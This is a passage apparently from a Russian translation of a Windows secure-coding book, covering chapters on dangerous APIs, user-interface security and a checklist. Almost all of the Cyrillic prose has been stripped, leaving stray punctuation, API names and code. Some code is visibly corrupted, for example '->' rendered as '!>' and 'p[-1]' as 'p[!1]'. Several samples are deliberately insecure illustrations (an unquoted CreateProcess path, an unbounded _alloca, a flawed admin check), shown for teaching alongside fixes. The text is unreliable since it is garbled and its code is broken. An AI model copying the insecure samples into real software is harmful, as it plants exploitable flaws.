SDDL.

. 
, . 
, .

586

IV

: 
, ,
, . , 
, OBJ_KER
NEL_HANDLE . 
, 
.
,
. ,
. , 
, , ,
. , ,
, 
,
, Zw*.
, ObReferenceObjectByHandle,
. 
, ObReferenceObjectByHandle, 
(
, ,
).


,
. , Windows NT
,
. 
.

.
ExAllocatePoolWithQuotaTag, try/except.
,
.


.  KeAc
quireSpinLock, .
, .
,

* , Zw,
ZwSignalAndWaitForSingleObject. . .

23

587

interlocked ExInterlockedInsertHeadList.
 (deadlock).

.
, , 
 IRQL_DISPATCH_LEVEL .
.



, , ,
. 
, , ,
, 
. 
 , 
. ,
, , ,
 , .
, 
try/except , MmProbeAndLockPages
ProbeForRead, 
try/except. .

NTSTATUS AddItem(PWSTR ItemName, ULONG Length, ITEM *pItem) {


NTSTATUS status = STATUS_NO_MORE_MATCHES;
try {
ITEM *pNewItem = GetNextItem();
if (pNewItem) {
// Probe! .
// LARGE_INTEGER.
ProbeForWrite(pItem, sizeof ITEM,
TYPE_ALIGNMENT(LARGE_INTEGER));
RtlCopyMemory(pItem, pNewItem, sizeof ITEM);
status = STATUS_SUCCESS;
}
} except (EXCEPTION_EXECUTE_HANDLER) {
status = GetExceptionCode();
}
return status;
}
, , : 
,
/ (I/O request packet, IRP) 
(ioStack>Parameters.Read.Length). 
, .

588

IV


/:
/: Irp>MdlAddress NULL;
/: Irp>AssociatedIrp. SystemBuffer ;
/: Irp>UserBuffer ,
.
, / ProbeForRead ProbeForWrite

!
, / Windows ,
Irp>IoStatus. Information, , Irp>IoStatus. Status 
. , Irp>IoStatus.Infor
mation, / ,
, 
/. . 
Irp>IoStatus. Status , ,
IoStack>Parameters.Read.Length. .
: 4 ,
8 , 
8 , / 4 8
4 .
, 8 4 
, .
, /
, Irp>IoStatus.Status 
( 0x800000000xBFFFFFFF).
(0xC00000000xFFFFFFFF) / .
IRP
. , STATUS_BUFFER_OVERFLOW (
), STATUS_BUFFER_TOO_SMALL ( 
).
/ (Memory Descrip
tor List, MDL), 
. 
, 
. 
, 
.
, 
,

. 
, 
, .

23

589

IOCTL FSCTL (File System


Control) ( ,
, , 
). ,
, . .
METHOD_NEITHER IOCTL FSCTL:
Inbuffer, InBufLen, OutBuffer OutBufLen
/ , .
METHOD_NEITHER METHOD_BUFFERED,
METHOD_IN_DIRECT METHOD_OUT_DIRECT. : 
!
/.
,
IOCTL.
METHOD_NEITHER.
( NULL)
,
, , ,
.

IRP-
, 
IRP 
/, / (IRP_MJ_CLEA
NUP). : IRP
. ,
IRP (
), . 
.
/,
, , 
/ . , 
, ,
.
, , 
.
IRP ,
. IRP 
IoCsqXxxx, CSQ.H.
IoSetStartIoAttributes
TRUE NonCancellable. ( Windows XP
.) ,
(startIo) IRP. ,
, , 

.

590

IV




:
?
? 
.
. ( , 
, ).

// !
// , ( szParam)
// .
HFILE hFile = CreateFile(szParam,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
// .
}
, 
.



,
. , 
, , 
. , ,
.

,

, 
. : 
.
, 
, .
, 
, .
, 

23

591

.
. .

X.509 Microsoft Internet Explorer 5: 
(. 231).

. 231.

Internet Explorer 5

, ,
: !
, ! ,
, No , 
Yes . 
, Yes, . ,
: ,
, .


CreateProcess
CreateProcess, CreateProcess
AsUser, CreateProcessWithLogonW, ShellExecute WinExec, , 
? CreateProcess,
.
, 
, 
, , . 
.
CreateProcess , , lpAppli
cationName lpCommandLine. ,
. Platform
SDK , lpApplicationName NULL,
, lpCom
mandLine. ( ) ,

. .

CreateProcess(NULL,
"C:\\Program Files\\MyDir\\MyApp.exe !p !a",
...);

592

IV

Program Files. Create


Process NULL, 
, , . C:\Program.exe ,

Files\MyDir\MyApp.exe p a.
,
, 
. 
Program.exe, ,
CreateProcess, .
. , Create
Process, , 
.
MyApp.exe, : C:\Temp C:\winnt\system32. , 
MyApp.exe system32, CreateProcess .
, CreateProcess, C:\Temp,
MyApp.exe. ,
system32,
, (C:\Temp) , ,
. Platform SDK 
CreateProcess ,
.
CreateProcess,
, .

NULL lpApplicationName
NULL lpApplicationName, 

, 
.
lpApplicationName, 
lpCommandLine. 
CreateProcess:

CreateProcess("C:\\Program Files\\MyDir\\MyApp.exe",
"MyApp.exe !p !a",
...);


lpCommandLine
lpApplicationName NULL,
, 
:

CreateProcess(NULL,
"\"C:\\Program Files\\MyDir\\MyApp.exe\" !p !a",
...);

23

593

( ) ,
CreateProcess ?




, ; , 
. Microsoft Windows 
16 ,
. DLL 
, DLL.
, , 
, DLL, 
.
, 
. 
.dangersec. , ,
:
.def:

SECTIONS
.dangersec READ WRITE SHARED
a .h* .c*:

#pragma comment(linker, "/section:.dangersec, rws")


!SECTION:.dangersec, rws
, HOWTO: Share Data Between Different Mappings of a DLL
Knowledge Base , 
.

CreateFileMapping ACL.


 , 
,
, .
, 
, SYSTEM , 
,
. .
, 
.

594

IV

Microsoft Windows .NET Server 2003,


,
. 7.
: RpcImper
sonateClient, ImpersonateNamedPipeClient, ImpersonateSelf, SetThreadToken, Impersonate
LoggedOnUser, CoImpersonateClient, ImpersonateAnonymousToken, ImpersonateDdeClient
Window ImpersonateSecurityContext.
, .


\Program Files
7, , , . 
\Program Files , ACE
, 
. 
. 
, : %<_
>%\My Documents, . 
, \Documents
Settings\All Users\Application Data\<_>.
\Program Files , 
, Windows 95 Windows NT , 
, .
HKEY_LOCAL_MACHINE ; .

HKLM
\Program Files, HKEY_LOCAL_MACHINE
, ACL
[ Everyone ()] 
.
HKEY_CURRENT_USER, .

FULL_CONTROL ALL_ACCESS
Windows NT 3.1 1993 .
,  : ,
, ,
. 
, ACL , 
.


,
Create. , ,
CreateNamedPipe CreateMutex, :
,

23

595

, , 
,
! ,
, 
.
exploit 
, , 
.
Microsoft Telnet, 
, Predictable Name Pipes Could Enable Privilege Elevation
via Telnet ( 
Telnet) http://www.microsoft.com/technet/
security/bulletin/MS01031.asp. Telnet 
, .
, Telnet 
, , .
: , 
, .
,
, .

#ifndef FILE_FLAG_FIRST_PIPE_INSTANCE
# define FILE_FLAG_FIRST_PIPE_INSTANCE 0x00080000
#endif
int fCreatedOk = false;
HANDLE hPipe = CreateNamedPipe("\\\\.\\pipe\\MyCoolPipe",
PIPE_ACCESS_INBOUND | FILE_FLAG_FIRST_PIPE_INSTANCE ,
PIPE_TYPE_BYTE,
1,
2048,
2048,
NMPWAIT_USE_DEFAULT_WAIT,
NULL); //
if (hPipe != INVALID_HANDLE_VALUE) {
// , !
CloseHandle(hPipe);
fCreatedOk = true;
} else {
printf(" CreateNamedPipe %d", GetLastError());
}
return fCreatedOk;
FILE_FLAG_FIRST_PIPE_INSTANCE: 
, 
GetLastError . Windows 2000 SP 1.

, .

596

IV

. 
,
DoS.
, ,
. ,
, .

HANDLE hMutex = CreateMutex(


NULL,
// .
FALSE,
"MyMutex");
if (hMutex == NULL)
printf(" CreateMutex: %d\n", GetLastError());
else
if (GetLastError() == ERROR_ALREADY_EXISTS )
printf("CreateMutex ** \n") ;
else
printf("CreateMutex \n");
, , ,

.
, 
,  .
, 
. 
, .

CreateFile
Win32 CreateFile , 
, .
,
, , ! , , 
CreateFile, ,
GetFileType. , 
CreateFile 
, , 
. 
, ,
. , 
, (
) 
.
dwFlagsAndAttributes
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
:

23

597

HANDLE hFile = CreateFile(pFullPathName,


0,0,NULL,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
NULL);
.
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
FILE_FLAG_OPEN_NO_RECALL, .

.
! , , 
, CreateFile.


UNIX , 
.
Windows , ,
. , 
Windows.
, MandrakeUpdate
LinuxMandrake. , MandrakeUpdate,
/tmp.
. http://www.secu
rityfocus.com/bid/1567.
/tmp XFree86 4.0.1. ,

.
. http://www.securityfocus.com/bid/1430.
:
;
, ;
, 
, 
.
Windows 
, GetTempPath GetTempFileName.
TMP TEMP 
GetTempPath.
: GetTempFileName
, GetTempPath 
, ACL. 
, , 
,

598

IV

( C:\Temp) . Windows XP
, LocalService
NetworkService, .
, .
GetTempFileName ,
, !
GetTempFileName ,
.
(. Secureco2\Chapter23\CreatTempFile) 
, , 
.

#include <windows.h>
HANDLE CreateTempFile(LPCTSTR szPrefix) {
// .
TCHAR szDir[MAX_PATH];
if (GetTempPath(sizeof(szDir)/ sizeof(TCHAR), szDir) == 0)
return NULL;
// .
TCHAR szFileName[MAX_PATH];
if (!GetTempFileName(szDir, szPrefix, 0, szFileName))
return NULL;
// .
HANDLE hTemp = CreateFile(szFileName,
GENERIC_READ | GENERIC_WRITE,
0,
// .
NULL, //
CREATE_ALWAYS,
FILE_ATTRIBUTE_TEMPORARY |
FILE_FLAG_DELETE_ON_CLOSE,
NULL);
return hTemp == INVALID_HANDLE_VALUE
? NULL
: hTemp;
}
int main() {
BOOL fRet = FALSE;
HANDLE h = CreateTempFile(TEXT("tmp"));
if (h) {
//
// .
//

23

599

CloseHandle(h);
}
return 0;
}
CreateFile. . 231 , 
.

23-1. CreateFile,

CREATE_ALWAYS


. , ,

,
. 

FILE_ATTRIBUTE_TEMPORARY

FILE_FLAG_DELETE_ON_CLOSE


.
,

MoveFile
. , ,
FILE_FLAG_DELETE_ON_CLOSE.

Indexing Service ( ), , 
For fast searching, allow Indexing Service to index this folder (
) (. 232).

. 232.

, ,
,
. , CryptoAPI (. 
Secureco2\Chapter23\CreateRandomPrefix).

600

IV

// CreateRandomPrefix.cpp
#include <windows.h>
#include <wincrypt.h>
#define PREFIX_SIZE (3)
DWORD GetRandomPrefix(TCHAR *szPrefix) {
HCRYPTPROV hProv = NULL;
DWORD dwErr = 0;
TCHAR *szValues =
TEXT("abcdefghijklmnopqrstuvwxyz0123456789");
if (CryptAcquireContext(&hProv,
NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT) == FALSE)
return GetLastError();
size_t cbValues = lstrlen(szValues);
for (int i = 0; i < PREFIX_SIZE; i++) {
DWORD dwTemp;
CryptGenRandom(hProv, sizeof DWORD, (LPBYTE)&dwTemp);
szPrefix[i] = szValues[dwTemp % cbValues];
}
szPrefix[PREFIX_SIZE] = '\0';
if (hProv)
CryptReleaseContext(hProv, 0);
return dwErr;
}

EFS

(EFS), ,
Microsoft. ,
, %TEMP%,
. 
EFS , ,
. EFS,
:
;
( dwFlagsAnd
Attributes CreateFile FILE_ATTRIBUTE_SYS
TEM);
, %TEMP% ( GetFileAttributes),
.

23

601



Windows 2000, NTFS (junc
tion). UNIX,
.
Linkd.exe, Windows Resource Kit.
,
. ,
. ,
, findstr /s. 
Linkd.exe,
, c:\users\attacker c:\.
, c:\users, .
,
(, rd /s). ,
c:\temp\tempdir c:\windows\system32.
, 
, rd /s c:\temp.
, , 
,
. 
(reparse points), 
,
FILE_REPARSE_POINT. , 
FILE_REPARSE_POINT. 
, GetFileAttributes lpFindFileData>dwFileAttributes
FindFirstFile.

,
,
, . 
: 
, .
, 
.
Web,

DHTML, . 
, , Perl

.

, .
, Windows NT Windows XP IP

602

IV

. ,
TcpIp,
,
. IP 
, 
IP.
, ,
.


, , ( 
) . 
, 
. Microsoft
Visual Studio .NET, , ,
. , .
, , 
. 
:
. ,
.
Windows Security Push
, Platform SDK:
Microsoft? : ,
.

!

, 
, , 
: . ,
, .
: 

.  ? , 
, 
? , !
,
. ,

,
. , 
.

23

603

,

,

, 
.
, 
, , ,
, .
. ,
C++ C#, 
, .
. : , , C++,
COM .NET, 
.


SID
, ,
, 
, 
(SID).
SID . SID,
, ?

PSID GetAdminSID() {
BOOL fSIDCreated = FALSE;
SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
PSID Admins;
fSIDCreated = AllocateAndInitializeSid(
&NtAuthority,
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&Admins);
return fSIDCreated ? Admins : NULL;
}
BOOL fIsAnAdmin = FALSE;
PSID sidAdmin = GetAdminSID();
if (!sidAdmin) return;
if (GetTokenInformation(hToken,
TokenGroups,
ptokgrp,
dwInfoSize,

604

IV

&dwInfoSize)) {
for (int i = 0; i < ptokgrp!>GroupCount; i++) {
if (EqualSid(ptokgrp!>Groups[i].Sid, sidAdmin)){
fIsAnAdmin = TRUE;
break;
}
}
}
if (sidAdmin)
FreeSid(sidAdmin);
Windows 2000 
. , 
, , SID 
(denyonly SID), 
. , TRUE ,
, 
SID. 
7. 
:

for (int i = 0; i < ptokgrp!>GroupCount; i++) {


if (EqualSid(ptokgrp!>Groups[i].Sid, sidAdmin) &&
(ptokgrp!>Groups[I].Attributes & SE_GROUP_ENABLED)){
fIsAnAdmin = TRUE;
break;
}
}
, 
Windows 2000 CheckTokenMember
ship. , ACL,

.



Windows, 14 . Win
dows 2000 14 ,
Windows 2000 256 
( NULL). 
Windows XP Stored User
Names and Passwords ( ) (. 9).

_alloca
_alloca . 
,

23

605

. 
_alloca.

void function(char *szData) {


PVOID p = _alloca(lstrlen(szData));
// p
}
szData, 
, _alloca , .
, .

_alloca :

void function(char *szData) {


__try {
PVOID p = _alloca(lstrlen(szData));
// p
} __except ((EXCEPTION_STACK_OVERFLOW == GetExceptionCode()) ?
EXCEPTION_EXECUTE_HANDLER :
EXCEPTION_CONTINUE_SEARCH) {
_resetstkoflw();
}
}

ATL

ATL, _alloca. A2W, W2A, CW2CT 
. , 
. , 
.
ATL 7.0 Visual Studio .NET 2003 
, , 
. 
:

#include "atlconv.h"
...
LPWSTR szwString = CA2WEX<64>(szString);
, C# stackalloc, _alloca.
stackalloc ,
/unsafe, unsafe:

public static unsafe void Fibonacci() {


int* fib = stackalloc int[100];
int* p = fib;
*p++ = *p++ = 1;
for (int i=2; i<100; ++i, ++p)
*p = p[!1] + p[!2];

606

IV

for (int i=0; i<10; ++i)


Console.WriteLine (fib[i]);
}


!
, . 
, 
, .
,
, .
, #ifdef:

#ifdef INTERNAL_USE_ONLY
# ifndef _DEBUG
#
error "
"
# endif // _DEBUG
// ""
#endif // INTERNAL_USE_ONLY
: 
,
.
, 
, :
DNS NetBIOS ;
(, 
);
, EXAIR\account account@explora
tionair.com.

DLL
, , : DLL
? ,
( , 
), 
, .
(, ), 
, DLL ,
, . 
( .rc)
LANGUAGE.

23

607


,
. 
, , ,
IIS ISA, , 
.
:  ,
, . 
.
: DNS NetBIOS , 
IP.
IP, , , 
IP ,
, . ,
: IP 
, . , 
(NAT) ? IP , 
192.168.0.1. !
IP ,
 ,
.

Application Log ( )
. , 
, .
: Microsoft Windows .NET
Server 2003 
. ACL 
. 
Application Log 
.

,
. :
, 
.
, 
.
.
 , ,
, , 
, . 
, , , 
, , .

608

IV


C/C++
Microsoft 
,
C C++, C# . ,
,

. DoS ,
 . , 
.

24

, 
Microsoft.
:
. , , ,
, , 
. 
, , , 
, 
!
, 
. 
, , 
, , , , 
, ,
.
, 

.


, ,
, 

610

IV

. , , 
, . 
,
, , ,
. , , (,
) , ,
.

, ,
, , .
. , ,
, 
, 
.
,
,
. 
, .
, , . 

. 
, .
,
, , .
, ,
,
.
.
.
, .
, , 
, 
,
.
, . ,
, ,
, 
.
.
. ,

. 

24

611

, , .

. ,
, , 
, .
:
, . 

, .
,
API .
,
, , 
API.



,
. ,

( , : ). 

, 
.
: 
, ,
. , ,
.

, .
!
, , ,
, .



( ), 
, ,
( ), .

.
, 
SOAPServer.

612

IV

SOAPServer 
SOAP.
SOAPServer 
. 
, (,
).
(, 
).
,
. 
, SOAP, . 
.
SOAPServer
, , .
Encrypt Commu
nications . 
TLS SOAPServer
.
, IPSec, TLS.

SOAP. SOAPServer 
IP , 
.

.
: , 
,
(ACL) SOAP.
ACL,
Windows .NET Server Access Control List.
SOAPServer TCP 80 (
) 443 ( ).
SOAP ,
TCP
, SOAPServer.
SOAPServer ,
,
, .
, 
.
, 
. . 
.

24

613

4: ISOAP_xxx
SOAPServer ISOAP_<_>,
, 
. , 
. ,
.

13:

. SSL/TLS,
.

14: SOAP-Server
, SOAPServer

IP DNS. , ,
.
, 
.

19:

SOAPServer
Micro
soft Windows .NET Server 2003. , :
,  SOAPServer .



,
. 
, , 
, , .
, , .

, .
?
, ,
, ().
.
, 
,
, .

614

IV


. 241
.

. 241.

, *

, .
, Yes,
No. (. 242),
, . 241.

. 242.

**

? , 
. , Microsoft Internet Explorer 

, No.
, , 
, . : ,

. , .


: 
, .

, 
, .
, .

* : 
. . ?
** : 
?

24

615

, ,
, ,
, . 
. . Windows
, , 
. 
, , 
. 
, , Windows , 
. 243.

. 243. ,
*
, 
, . :
( );
( 
);
( ,
).
.

, . 
Microsoft Windows, 
, , .

, Caps Lock**.
,
, . 
, 
, .
,
,
, .

, ,

* . .
Caps Lock.
* Windows 
. . .

616

IV

. Microsoft Internet Information Services (IIS) 


,
, 
. .
, (
),
. IIS
.



.
(. 224) .

. 244.

No, 
, . ,
, . , 
, .  
. ? Yes?
No?
,
.
, . , .
! ,
No , 
Yes . 
, Yes,
. , ,

, .
,
.
(informed consent).
, 
,
:

24

617

,
;
;
, ;
, 
;
, ?
, ;
? ?

. 
. ; 
,
. ,
, 
.
. 245
, .

. 245.
*

* .
, ,
, Acme Incorporated.
Windows ,
Acme Incorporated. , 
, Acme
Incorporated.
Windows 
, 
. , , 
.
? 
Yes, No. . .

618

IV

, , 
, .
.


,

. 
,  .
, .
, .
, 
, (progressive disc
losure). , 
. 
,
().
. 246
.

. 246. ,


, .
. 
 ( 
, . 241).
, . 241 , 
. , 
(. 247).

24

. 247.

619


, ,
, , .
, . , .
, ,
, . ,
, 
. , ,
( ), 
, . 
: ?.
. 
, , ,
.
:
, , ,
:
. 
, 
 , ?
, 
. , 

. , 
.

* ,
. , 
.
, 
.
,
.
? . .

620

IV

, ,
, ,

. ?
. , ,
.
, Content (
) Internet Options ( ) Internet
Explorer, , 
. Windows Microsoft ,
, . 
.

. 
Security () Internet
Options Internet Explorer (. 248).

. 248.

,
(, 
) , . 
,
, . 

, 
.
.

24

621



, ,
,
. , 

. :
;
;
;

;
, , ;
;
;
;
;
?
, ,

. 
, . ,
, . ,
, 
.



, ,
, , , 
. 
,
:
,
;
,
;
, 
;
, 
, ;

622

IV

, 
;
, , 
.

.



, 
,
. 
, , 
, ,
.
. Windows XP Windows 2000,
Control Panel ( ) Administrative Tools (
) Local Security Policy ( 
). , 
( ) .
Local Policies ( ) Security Options ( 
). , ? , 
Do not Allow Anonymous Enumeration of Accounts and Shares (
) Network
Access ( ). ? ?
?
Help (), Security
Settings ( ),
.

.
, , 
.
, .

. ,
1000 ( ).

.
, 
Active Directory,
. 

,
.

24

623

,
, ,
. 
.


, :
. , ,

,
. 
, 
.

API-

API . 

, , , 
, 
. , .
5 , 

. 
,
.
(Dave Cutler), Microsoft Windows NT, 
, ,
. , . 
, 
. :
, ,
, ! 
(
) . , 
, , 
.
, .
, 
 , . 
, , 
. ,

API-

627

, , 
.
! , ,
. 
,
.

API-,

C
, .
.
strcpy, wcscpy, lstrcpy, _tcscpy _mbscpy
 , null
.  ,
.
n ( n) strsafe.
! n strsafe 
; 

.
strcat, wcscat, lstrcat, _tcscat _mbscat , 
.
strncpy, wcsncpy, _tcsncpy, lstrcpyn _mbsnbcpy ,
. 
null .
strncat, wcsncat, _tcsncat _mbsnbcat , 
, , .
,
.
memcpy CopyMemory 
, Length. 
. _memcpy,
, 
.
sprintf swprintf 
. , 

628

.
StringCchPrintf.
_snprintf _snwprintf 
. ,
( ) .
StringCchPrintf.
printf printf, _sprintf, _snprintf, vprintf, vsprintf 
Unicode. , 
. ,
Unicode %s
, 
, . 
WideCharToMultiByte.
,
%s (, sprintf(szTemp, "%d, %s", dwData, szString), 
, strcpy.
_snprintfI StringCchPrintf.
strlen, _tcslen, _mbslen wcslen 
, . 
,
, .
gets . 
, gets .
! fgets.
getc .
scanf("%s",), _tscanf wscanf gets, 
scanf, _tscanf, wscanf %s,
. , , , 
%32s, fgets.
(>>) STL
. , 
. , stdin
(cin) szTemp, 16 , 
.

#include "istream"
void main(void) {
char szTemp[16];
cin >> szTemp;
}
, gets. 
cin.width.
MultiByteToWideChar ,
Unicode , . ,
. :

API-

629

WCHAR wszName[NAME_LEN];
MultiByteToWideChar(,,,,sizeof(wszName));
sizeof(wszName)/sizeof(wszName[0])
NAME_LEN, ,
.
_mbsinc, _mbsdec, _mbsncat, _mbsncpy, _mbsnextc, _mbsnset, _mbsrev, _mbsset,
_mbsstr, _mbstok, _mbccpy _mbslen 
( )
,
. 
/ , isleadbyte, _ismbslead _ismbs
trail. _mbbtype.

API-,

CreateDirectory, CreateEvent, CreateFile, CreateFileMapping, CreateHardLink,
CreateJobObject, CreateMailslot, CreateMutex, CreateNamedPipe, CreateSemap
hore, CreateWaitableTimer, MoveFile , 
. API, , ,
(namesquatting).
. , ,
, .
,
c:\temp , , 

. , ,
, , 
, , .
,
, Microsoft Windows 2000 Documents and
Settings. 
, .
( ) CREA
TE_NEW , 
, .
, ,
. 
. ,
, , !
UNIX
, 
Windows. , Windows 
, , 
, 
(Terminal Services).

630

,  , 
, , 
. ,
. 
FILE_FLAG_FIRST_PIPE_INSTANCE.
: Windows 2000 SP1 
(. 23).
: 
, 
, .
, , .
. 

.
RPC
,
, . , , 
, 
.

API-,

. ,
, 
,
.
CreateProcess(NULL,), CreateProcessAsUser CreateProcessWithLogon.
, . 
null, , 
. , c:\Program Files\MyApp\My
App.exe, c:\Prog
ram.exe. :
.
WinExec ShellExecute , CreateProcess(NULL,),
.
LoadLibrary, LoadLibraryEx SearchPath Windows
. 
DLL, (, file.dll c:\dir\dir\file.dll), 
, ,
. 
.
: DLL , 
, ,
. DLL 

API-

631

, DLL GetWindowsDirectory.
, .
Windows XP SP1 Windows .NET Server 2003 
, .
.


,
(scroll bar). , 
.
, ( ) (hWnd)
SendMessage. 
?
TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING TVM_GETISEAR
CHSTRING ; 
, lParam NULL, .
TTM_GETTEXT ; 
, 80 . 
.
CB_GETLBTEXT, CB_GETLBTEXTLEN, SB_GETTEXT, SB_GETTEXTLENGTH, SB_GET
TIPTEXT, LB_GETTEXT LB_GETTEXTLEN 
GETTEXTLENGTH, .
: 
, 
. .

(ToolTip) SB_GETTIPTEXT.
ES_PASSWORD 
(). ,
GetWindowText SetWindowText,
. 9.

API-
 , 

. 
,
, SYSTEM .
. 
, . 
: RpcImpersonateClient, ImpersonateLoggedOnUser, CoImpersonate
Client, ImpersonateNamedPipeClient, ImpersonateDdeClientWindow, ImpersonateSecurity
Context, ImpersonateAnonymousToken, ImpersonateSelf SetThreadToken.

632

, Microsoft Windows .NET Server 2003 


.
. Windows .NET Server 2003,
:
Impersonate (
Identify, );
SeImpersonatePrivilege;
( )
LogonUser, ;
;
COM COM+,
COM, COM
. COM,
Activate as Activator.
SetSecurityDescriptorDacl(,,NULL,)
, (NULL) DACL, 
(pDacl) NULL. DACL .
ACE Full Control: Deny
Everyone, , 
.

API-, DoS-
API 
, .
InitializeCriticalSection EnterCriticalSection
, ,
. InitializeCriticalSection
AndSpinCount. : EnterCriticalSection Windows XP,
Windows .NET Server . , 

. ,
.
,
LeaveCriticalSection.
. C++ 
, LeaveCriticalSection 
.
_alloca , 
, , 
! , 
, , . 
 _alloca, , A2OLE, T2W, W2T,
T2COLE, A2W, W2BSTR A2BSTR.

API-

633

_alloca: 
, 
.
, _resetstkoflw ; 

, . .

#include "malloc.h"
#include "windows.h"
...
void main(int argc, char **argv) {
try {
char *p = (char*)_alloca(0xfffff);
} __except(GetExceptionCode() == STATUS_STACK_OVERFLOW) {
int result = _resetstkoflw();
}
}
TerminateThread TerminateProcess
. TerminateThread. ,
, , . 
Platform SDK:
TerminateThread ,
. TerminateThread,
, 
,
.
TerminateThread 
. TerminateProcess
, DLL,
ExitProcess,
. , UNIX: TerminateProcess 
, . Win32
.

API-
, 
. 
, .
, , 
,
TCP.
bind , INADDR_ANY ( )
. 15.

634

recv ,
. 1, 
( ) 0,
. recv 
. recv
.
WSAEventSelect. ,
.
send , . 
, , send 
. connect send. 
, TCP 
, send
. , 
, .
NetApi32
Windows. :
NetUserGetInfo, NetShareEnum . , . 
, , , 
45, . :
SMB (Server Message Block)
, Microsoft, .
, Microsoft
, NULL. ,
,
.

API-
API, .
IsBadReadPtr, IsBadWritePtr, IsBadCodePtr, IsBadStringPtr, IsBadHugeReadPtr
IsBadHugeWritePtr IsBadxxxPtr
: .
16 Windows, 
. 
NULL.
. , . 
 ,
. 
, , 
STATUS_ACCESS_VIOLATION.
, , ,
, !
, , ,
. IsBadWritePtr

API-

635

. , ,  ,
.  Windows,

.
! , 
.
, IsBadWritePtr !
CopyFile MoveFile ,
ACL. , CopyFile, ACL
, , ,
MoveFile, ACL. ,
; CLSCTX_REMOTE_SERVER.

, 
, 
,
.
!
?
!
, .
, ACL.
, .
.
, ,
.
, 
.
!
exploit.
!
, !
, .

637

!
! !  , 
, , 
. , 
, , , . ,
!
(scripts) 
RPC,
, 
(script kiddies), .
. 
,  :
.
, 
Perl, 
, ! ,
 
!
.
, ,
 , 
, !

?
. :
, , !
, , . 
, ,
. ,
. 
. ,
, ,
, .
: ,
!

!
: ! , :
! : 

. . 

, , ,
, . 
,  exploit, 
( ) .

638

,
, .
, 
. 
, .
, 
, .

, . 
, , .  
 :
. , ,
.

.
, . .
, , ,
!
:  ,
. 
: *.

,

: .
, 
. , 
:
;
.
, , ,
. 
, ,
.
, 
.
, .

, .

, ACL
Windows NT/2000/XP
(ACL). , ACL 
* 28 373 
. . .

639

. ACL
.

ACL. ,
ACL , Everyone (). 
, ( )
, ( ).
ACL Everyone , 
.

,
. Microsoft.
Web , ,
. ,

. ! ,
.
, 
Web. .
,
HTTP 80, .
,
Web!
, 
Web. 
, 
, SSL/TLS
HTTP. .
,
.
.


! , 
, , !
Boeing 747400 ?
,  ! , , ,
( , ), ,
. ? , .
, ,
, . 
.
, , 
,
.
,
. ,

640

, 
. .
, ,

.  45
, . 20
, ,
!
:
(open source).
, ,
, .
, ,
. ,
Microsoft: , .
, 
, ! !

, ,

, :
. :
, ;
, ;
, ;

;
.
: , , 
, 
. , , 
.
IIS 5, IIS 6 
; 
. , , 
, !

,

.
: ?
: !
: ?

641

: ,
.
: , , , ?
.
, 
,
! . 

. ,
.
. ,
. 
,

. , , !

.
,
. . 
, .

!
, , 
, . ...
,
. , 
, , 
. 
,
. , . 
, ,

, , .
, 
, . 
, !

exploit-

, , 
. :
30 , exploit, 
10 . 
, ,
, 
. . ,

642


. ,
, ,
, 
999 999 . :
,
, . ,  , 
.


, . 
, , 
. , 99 100 
,
. , ,
,
, ?
!

, .

, !
! . , 
, .
,
!  ,
, : Notepad .
, 

. .
,
, .

( Security Templates) 
, ,
. 
, 
.

, BugTraq
NTBugtraq

3, 7

ActiveX,

16

.
,

23

. . .

644

()

23
23

22

23

24


, ,

. : , ,
, . 
, ,
.  , :
, 
.
, ( Security
Templates) , 
, , 
.

GS ( Visual C++ .NET)

RTC1
( Visual C++ .NET)

10

. . .

646

()


Strsafe.h

DACL
, DACL
(NULL)
Everyone ()

14
( PWLEN + 1,
, PWLEN
LMCons.h 256)

23


( ),

23

NTLM
SSPI ( Negotiate)

16

23

CreateProcess
NULL,

23

, ,

17

24

23

11

,
(, COM1, PRN, .)

11

23


HKLM


C:\Program Files

GENERIC_ALL,

IP,
0 INADDR_ANY

15

647

()


( ),
API

23

7, 23
23

Web

Web


13

SQL

12

SQL Server sa

12

ISAPI IIS 5

13

Web

13

eval

13

REFERER

13

23

RPC

IDL /robust

[range]

16

RPC

16

16

16

16

(NULL)

16

16

RPC

16

16

648

ActiveX, COM DCOM


ActiveX,
,

16

SiteLock

16

( ,
DLL, , .)

memset ZeroMemory
. ,
 , SecureZeroMemory


CryptoAPI
System.Security.Cryptography

RC4

,
RC4

( 128 ,
40)

FXCop

18

XML

18

, ,

18

, ,

18

18

RequestMinimum

18

RequestRefuse

18

RequestOptional
,

18

, ,

18

649

()

18

Assert RevertAssert

18

, ,

18

Assert
PermitOnly Deny. ,

18

LinkDemand .

18

18

SuppressUnmanagedCodeSecurityAttribute

18

18

( Security Templates) 
, 
. 
, 
.

19

SQL,


12, 19

2
SafeDllSearchMode Windows XP
Microsoft Windows .NET Server 2003

11


 ,

,
,

651

()

,

,

,
ActiveX,
, ,

16

.
,

23

, 
:

.
, ,
, , 
. ,
.
, 
.
, , 
, .
, ,
, .
, 

.
, 
. ,
, .
,
.
, .

1. Adams, Carlisle, and Steve Lloyd. Understanding the PublicKey Infrastruc


ture. Indianapolis, IN: Macmillan Technical Publishing, 1999.
, X.509
X.509 (PKIX). 
IETF, .
, Jalal Feghhi, . ,
, .
2. Amoroso, Edward G. Fundamentals of Computer Security Technology. Engle
wood Cliffs, NJ: Prentice Hall PTR, 1994. .

. 
. 
, , 
(BellLaPadula), (Biba) 
(ClarkWilson). , 
.
3. Anderson, Ross J. Security Engineering. New York: Wiley, 2001. ,
.

, ,
.
4. Brown, Keith. Programming Windows Security. Reading, MA: AddisonWes
ley, 2000. , API Windows,
.
5. Christiansen, Tom, et al. Perl Cookbook. Sebastopol, CA: OReilly & Associates,
1998.
Perl, .
Perl, , 
.
6. Feghhi, Jalal, and Peter Williams. Digital Certificates: Applied Internet
Security. Reading, MA: AddisonWesley, 1999. ,
,
. ,
, X.509 (PKI).
7. Ford, Warwick. Computer Communications Security: Principles, Standard
Protocols, and Techniques. Englewood Cliffs, NJ: Prentice Hall PTR, 1994.

654

, , 
, , ,
,
